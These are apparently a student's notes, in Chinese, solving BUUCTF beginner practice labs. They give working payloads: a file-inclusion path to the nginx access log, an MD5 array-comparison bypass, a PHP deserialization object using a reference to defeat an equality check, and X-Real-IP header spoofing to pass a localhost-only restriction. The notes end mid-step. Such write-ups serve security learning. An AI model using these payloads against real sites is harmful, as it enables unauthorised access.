Linux Labs
使用ssh连接,用户是 root,密码:123456,
-p指定端口,端口是随机的
然后输入yes,后输入密码即可连接上了
ssh -p 25527 [email protected]
BUU LFI COURSE 1
?file=/var/log/nginx/access.log :包含ngnix的日志记录
BUU CODE REVIEW 1
代码审计:
第一层
get post
?pleaseget=1
pleasepost=2
第二层
md5漏洞
传递md51和md52的内容不同
但是md5值相同
pleasepost=2&md51[]=1&md52[]=2
第三层
反序列
php代码执行完毕之后调用__destruct()魔术方法,因此我们可以通过控制变量correct和input达成目的
可以让correct和input的地址相同,这样不管其中任意一个变量发生变化,另外一个也同步变化,实现$this->correct===$this->input为永真
<?php
class BUU{
public $correct = "";
public $input = "";
}
$chen = new BUU();
$chen->input=&$chen->correct;
$chen = serialize($chen);
echo $chen."<br />";
//O:3:“BUU”:2:{s:7:“correct”;s:0:"";s:5:“input”;R:2;}
所以payload:
GET部分:?pleaseget=1
POST部分:pleasepost=2&md51[]=1&md52[]=2&obj=O:3:"BUU":2:{
s:7:"correct";s:0:"";s:5:"input";R:2;}
BUU BURP COURSE 1
提示只能本地访问
抓包,构造X-Forwarded-For: 127.0.0.1
发现没有用,这里就运用一个新的X-Real-IP: 127.0.0.1
发现了账号密码
将GET改为POST,然后在下面输入用户名和密码:
